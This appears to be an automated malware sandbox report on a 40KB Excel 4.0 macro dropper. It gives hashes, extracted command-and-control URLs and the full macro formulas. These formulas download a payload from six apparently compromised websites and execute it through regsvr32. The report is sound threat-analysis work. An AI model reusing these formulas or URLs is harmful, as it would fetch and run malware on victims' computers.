General

  • Target

    cfa217d1ba7323da257ed9a03f5735a343973c46bf6b0cd577648e9fdb72245e

  • Size

    40KB

  • Sample

    241120-v2j9sazpaz

  • MD5

    bf90722d9c2762b5d8cd67b0bd50bcfa

  • SHA1

    c44bb9681ad2d5d1b6c7dca2feccf9482442ccfc

  • SHA256

    cfa217d1ba7323da257ed9a03f5735a343973c46bf6b0cd577648e9fdb72245e

  • SHA512

    188710d019768a25b4795409bba56d9e4ea65afa7adf2c6863c0bcd7b87e596f2017d9a346264422ed50d54eab2c0c74dc4ae1c07d9af1f2ff4d1048fad6e1be

  • SSDEEP

    768:yknyGomihd8DOevZCwtCyKfcrND59V+L9Rw4eWrXcTqZ0Vfs3GTE:KGom8eDmylND59V4jwmXc2CVfs37

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://wellnessonus.com/wp-admin/OFq5F8Y/

http://choicepestcontrol.xyz/wellknown/PERKnM4X/

https://sse-studio.com/cq0xhpj/6pmmsaPCOGtG6/

http://velasaromaticasonline.com/wp-admin/5Id5LqSb3O3BUM5Z/

https://alonsoconsultancyservice.com/wp-content/0r7tMAnLfwKu0gvcH/

http://trainingchallenges.xyz/wp-admin/ebPbsOdsRJA9G/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wellnessonus.com/wp-admin/OFq5F8Y/","..\dan.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://choicepestcontrol.xyz/wellknown/PERKnM4X/","..\dan.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/6pmmsaPCOGtG6/","..\dan.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://velasaromaticasonline.com/wp-admin/5Id5LqSb3O3BUM5Z/","..\dan.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alonsoconsultancyservice.com/wp-content/0r7tMAnLfwKu0gvcH/","..\dan.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://trainingchallenges.xyz/wp-admin/ebPbsOdsRJA9G/","..\dan.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://wellnessonus.com/wp-admin/OFq5F8Y/

xlm40.dropper

http://choicepestcontrol.xyz/wellknown/PERKnM4X/

xlm40.dropper

https://sse-studio.com/cq0xhpj/6pmmsaPCOGtG6/

xlm40.dropper

http://velasaromaticasonline.com/wp-admin/5Id5LqSb3O3BUM5Z/

xlm40.dropper

https://alonsoconsultancyservice.com/wp-content/0r7tMAnLfwKu0gvcH/

Targets

    • Target

      cfa217d1ba7323da257ed9a03f5735a343973c46bf6b0cd577648e9fdb72245e

    • Size

      40KB

    • MD5

      bf90722d9c2762b5d8cd67b0bd50bcfa

    • SHA1

      c44bb9681ad2d5d1b6c7dca2feccf9482442ccfc

    • SHA256

      cfa217d1ba7323da257ed9a03f5735a343973c46bf6b0cd577648e9fdb72245e

    • SHA512

      188710d019768a25b4795409bba56d9e4ea65afa7adf2c6863c0bcd7b87e596f2017d9a346264422ed50d54eab2c0c74dc4ae1c07d9af1f2ff4d1048fad6e1be

    • SSDEEP

      768:yknyGomihd8DOevZCwtCyKfcrND59V+L9Rw4eWrXcTqZ0Vfs3GTE:KGom8eDmylND59V4jwmXc2CVfs37

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks